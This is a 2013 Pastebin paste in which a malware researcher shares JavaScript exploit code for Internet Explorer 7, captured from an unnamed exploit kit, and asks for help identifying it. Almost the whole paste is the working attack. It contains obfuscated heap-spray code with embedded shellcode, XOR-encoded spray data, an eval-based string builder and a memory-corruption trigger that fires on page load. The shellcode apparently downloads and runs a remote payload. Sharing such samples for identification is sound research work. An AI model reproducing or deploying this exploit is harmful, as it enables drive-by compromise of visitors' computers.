malwageddon

Unknown EK / IE7 Exploit

Sep 28th, 2013
235
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // The exploit code for IE7 included in Unknown EK captured on 2013-09-27
  2. // I'd appreciate any help in trying to identify it
  3. // I can be contacted @malwageddon or malwageddon@gmail.com
  4.  
  5.     var memory = new Array();
  6.  
  7.    
  8. function sUgpRBKK(LMJPUcmSVSKUoQ, mBTWcbyaftSRdi)
  9. {
  10.       var BYFFSYbjYKDJvd = LMJPUcmSVSKUoQ.toString(16);
  11.       BYFFSYbjYKDJvd = '00000000'.substring(0, 8 - BYFFSYbjYKDJvd.length) + BYFFSYbjYKDJvd;
  12.      
  13.       var JTNgIQpUjetutQ = (parseInt(BYFFSYbjYKDJvd.substring(0, 2), 16) ^ mBTWcbyaftSRdi).toString(16);
  14.       var kFRPcenzcaKnct = '00'.substring(0, 2 - JTNgIQpUjetutQ.length) + JTNgIQpUjetutQ;
  15.       JTNgIQpUjetutQ = (parseInt(BYFFSYbjYKDJvd.substring(2, 4), 16) ^ mBTWcbyaftSRdi).toString(16);
  16.       kFRPcenzcaKnct = kFRPcenzcaKnct + '00'.substring(0, 2 - JTNgIQpUjetutQ.length) + JTNgIQpUjetutQ;
  17.       JTNgIQpUjetutQ = (parseInt(BYFFSYbjYKDJvd.substring(4, 6), 16) ^ mBTWcbyaftSRdi).toString(16);
  18.       kFRPcenzcaKnct = kFRPcenzcaKnct + '00'.substring(0, 2 - JTNgIQpUjetutQ.length) + JTNgIQpUjetutQ;
  19.       JTNgIQpUjetutQ = (parseInt(BYFFSYbjYKDJvd.substring(6, 8), 16) ^ mBTWcbyaftSRdi).toString(16);
  20.       kFRPcenzcaKnct = kFRPcenzcaKnct + '00'.substring(0, 2 - JTNgIQpUjetutQ.length) + JTNgIQpUjetutQ;
  21.  
  22.     return unescape('%u' + kFRPcenzcaKnct.substring(4, 8) + '%u' + kFRPcenzcaKnct.substring(0, 4));
  23. }
  24.    
  25.     function heapspray()
  26.     {
  27.         var scode = "\uc033\u70eb\u5655\uc033\uf83b\ud78b\u1175\u33fc\u64c0\u408b\u8b30\u0c40\u708b\uad1c\u508b\u5708\u428b\u8b3c\u0244\u0378\u50c2\u408b\u0320\u33c2\u41c9\u348b\u0388\u33f2\u50ff\uc033\ucfc1\uac13\uf803\uc085\u7558\u3bf2\u75fb\u58e6\u588b\u0324\u66da\u0c8b\u8b4b\u1c58\uc38b\uc203\u048b\u0388\u5fc2\u5d5e\ue0ff\u6a50\ubb40\u7a36\ud8eb\u91e8\uffff\uc3ff\udb33\u6853\u642e\u6c6c\u6568\u336c\u6832\u656b\u6e72\udc8b\u11b8\u0101\u2d01\u0101\u0101\u3350\u50c0\ubb53\uc49f\ua803\uff33\u61e8\uffff\u8bff\u33f8\ub8c0\u0301\u0101\u012d\u0101\u5001\uafe8\uffff\u5bff\u5050\ubb53\u4179\u88e7\u3fe8\uffff\u5aff\u5257\u3350\u53db\u6db8\u016d\u2d01\u0101\u0101\u6850\u6e6f\u642e\u7568\u6c72\u8b6d\ub8dc\u0111\u0101\u012d\u0101\u5001\uc033\u5350\u9fbb\u03c4\u33a8\ue8ff\uff06\uffff\uf88b\u11b8\u0101\u2d01\u0101\u0101\ue003\u5a58\uc203\u55b9\u716e\u8173\u01e9\u0101\u8901\u4008\u4040\ub940\u7770\u656a\ue981\u0101\u0101\u0889\u4040\u4040\u66b9\u2f73\u8165\u01e9\u0101\u8901\u4008\u4040\ub940\u6d6d\u0101\ue981\u0101\u0101\u0889\u4040\u4040\uc933\u0889\uca8b\u01b8\u0101\u2d01\u0101\u0101\ub850\u673e\u656f\u012d\u0101\u5001\u40b8\u7865\u2d6d\u0101\u0101\ub850\u712f\u7169\u012d\u0101\u5001\u66b8\u336f\u2d6a\u0101\u0101\ub850\u6a30\u656f\u012d\u0101\u5001\u30b8\u626f\u2d77\u0101\u0101\ub850\u6a30\u686e\u012d\u0101\u5001\u67b8\u6673\u2d68\u0101\u0101\ub850\u6e70\u7430\u012d\u0101\u5001\u76b8\u2f79\u2d64\u0101\u0101\ub850\u6666\u666d\u012d\u0101\u5001\u3bb8\u3030\u2d6c\u0101\u0101\ub850\u7569\u7175\u012d\u0101\u5001\udc8b\u3351\u50c0\u5150\u5053\u7dbb\u18c0\ue883\ufdfc\uffff\ub859\u0139\u0101\u012d\u0101\u0301\u5fe0\ub851\u0107\u0101\u012d\u0101\u5001\ubb51\ued82\u34b7\ud7e8\ufffd\u59ff\u11b8\u0101\u2d01\u0101\u0101\u3350\u50c0\ubb51\uc49f\ua803\ubde8\ufffd\ub8ff\u0111\u0101\u012d\u0101\u0301\u90e0";
  28.  
  29.         // Do not modify this part
  30.  
  31.         scode = "\uec89\u9055" + scode
  32.         scode += "\uc033\uc948\u90c9\uc9c9\ubec9\u0D18\u1624\u90c3"
  33.  
  34.         var heapBlockSize = 0x400000;
  35.         var spraySlideSize = heapBlockSize
  36.         var heapSprayToAddress = 0x14000000;
  37.        
  38.         var l = scode.length;
  39.        
  40.         n = 4*256 -2*128 -2*l;
  41.        
  42.     var ssym = "%u";
  43.        
  44.         var fill = "";
  45.     var j = 0;
  46.     var b = 0;
  47.         while (j<n/2) {
  48.         var a = b.toString();
  49.             fill = fill + ssym + a+a+a+a;          //fill string with u%0000 to respect alignment
  50.         j++;
  51.         }
  52.        
  53.     var asd = "";
  54.    
  55. var MJpdWCGh = [3974950124, 3991793133, 4008636142, 4025479151, 3907578088, 3924421097, 3941264106, 3958107115, 3840206052, 3857049061, 3873892070, 3890735079, 3772834016, 3789677025, 3806520034, 3823363043, 4244438268, 4261281277, 4278124286, 4294967295, 4177066232, 4193909241, 4210752250, 4227595259, 4109694196, 4126537205, 4143380214, 4160223223, 4042322160, 4059165169, 4076008178, 4092851187, 3435973836, 3452816845, 3469659854, 3486502863, 3368601800, 3385444809, 3402287818, 3419130827, 3129516424, 3318072773, 3334915782, 3351758791, 3233857728, 3250700737, 3267543746, 3284386755, 3705461980, 3722304989, 3739147998, 3755991007, 3638089944, 3654932953, 3671775962, 3688618971, 3570717908, 3587560917, 3604403926, 3621246935, 3503345872, 3520188881, 2896997549, 3553874899];
  56. var mjhBrAxP = '';
  57. for(VDiTHUMo = 0; VDiTHUMo < MJpdWCGh.length; VDiTHUMo++)
  58. {
  59.     var KynJjjwV = '';
  60.     KynJjjwV = sUgpRBKK(MJpdWCGh[VDiTHUMo], 172);
  61.     mjhBrAxP += KynJjjwV;
  62. }
  63.  
  64.     asd = mjhBrAxP;
  65.    
  66.         var spraySlide = asd + scode + unescape(fill);
  67.  
  68.         heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
  69.  
  70.         memory[0] = str_concate(spraySlideSize, spraySlide);
  71.         var i = 1;
  72.         while (i <  heapBlocks)
  73.         {
  74.             memory[i] = memory[0].substring(0,memory[0].length);
  75.             i++;
  76.         }
  77.         return memory;
  78.     }
  79.        
  80.     function getSpraySlide(spraySlide, spraySlideSize)
  81.     {
  82.         return str_concate(spraySlideSize, spraySlide);
  83.     }
  84.    
  85.     var a = new Array();
  86.     for (i=0; i<0x2000; i++)
  87.     {
  88.         a[i] = document.createElement("param");
  89.     }
  90.     function spray()
  91.     {
  92.         for (i=0; i<0x2000; i++)
  93.         {
  94.             a[i].value = "\u0024\u1624AABBBBAAAABBBBAAAABBBBAAAABBBBAAAABBBBAAAABBBBAAAABB"
  95.         }
  96.     }
  97.     function asdasd()
  98.     {
  99.     var f = "form1";
  100.         var form1 = document.getElementById(f);
  101.     var im = "image";
  102.         var input = document.createElement("<input type='" + im + "'>")
  103.     var fields = "fieldset";
  104.         var fieldset = document.createElement(fields)
  105.         fieldset.appendChild(input);
  106.         fieldset.applyElement(form1);
  107.         form1.innerHTML = "";
  108.         input = null;
  109.         spray();
  110.         heapspray();
  111.         document.body.innerHTML += "<iframe src='about:blank'></ifra" + "me>"
  112.     }
  113.  
  114.    
  115. function OjvEgxap(jUmKlPBy, PAYGYXdz)
  116. {
  117.       var AKqLndog = jUmKlPBy.toString(16);
  118.       AKqLndog = '00000000'.substring(0, 8 - AKqLndog.length) + AKqLndog;
  119.      
  120.       var QbwOYreu = (parseInt(AKqLndog.substring(0, 2), 16) ^ PAYGYXdz).toString(16);
  121.       var hjMmnhoL = '00'.substring(0, 2 - QbwOYreu.length) + QbwOYreu;
  122.       QbwOYreu = (parseInt(AKqLndog.substring(2, 4), 16) ^ PAYGYXdz).toString(16);
  123.       hjMmnhoL = hjMmnhoL + '00'.substring(0, 2 - QbwOYreu.length) + QbwOYreu;
  124.       QbwOYreu = (parseInt(AKqLndog.substring(4, 6), 16) ^ PAYGYXdz).toString(16);
  125.       hjMmnhoL = hjMmnhoL + '00'.substring(0, 2 - QbwOYreu.length) + QbwOYreu;
  126.       QbwOYreu = (parseInt(AKqLndog.substring(6, 8), 16) ^ PAYGYXdz).toString(16);
  127.       hjMmnhoL = hjMmnhoL + '00'.substring(0, 2 - QbwOYreu.length) + QbwOYreu;
  128.  
  129.     return unescape('%u00' + hjMmnhoL.substring(6, 8) + '%u00' + hjMmnhoL.substring(4, 6) + '%u00' + hjMmnhoL.substring(2, 4) + '%u00' + hjMmnhoL.substring(0, 2));
  130. }
  131.    
  132. function str_concate(val, str)
  133. {
  134.   var sONNxwxA = 0xac;
  135.  
  136.   var auCYJaZh = "eval";
  137.  
  138. var owLcqHrQ = [3234186459, 3638527177, 3384836830, 3302542274, 3666910854, 2357575885, 2279528671, 3738754961, 903732375, 2432266531];
  139. var mjhBrAxP = '';
  140. for(VDiTHUMo = 0; VDiTHUMo < owLcqHrQ.length; VDiTHUMo++)
  141. {
  142.     var KynJjjwV = '';
  143.     KynJjjwV = OjvEgxap(owLcqHrQ[VDiTHUMo], 172);
  144.     mjhBrAxP += KynJjjwV;
  145. }
  146.  
  147.  
  148.   var evl = window[auCYJaZh];
  149.   var cyc = mjhBrAxP.substring(0, 33);
  150.  
  151.   var res = evl(cyc);
  152.  
  153.   res = res.substring(0,val/2 - 0x1000);
  154.   return res;
  155. }
  156.  
  157. <form id="form1"></form>
  158.  
  159.     setTimeout("asdasd();",1);
RAW Paste Data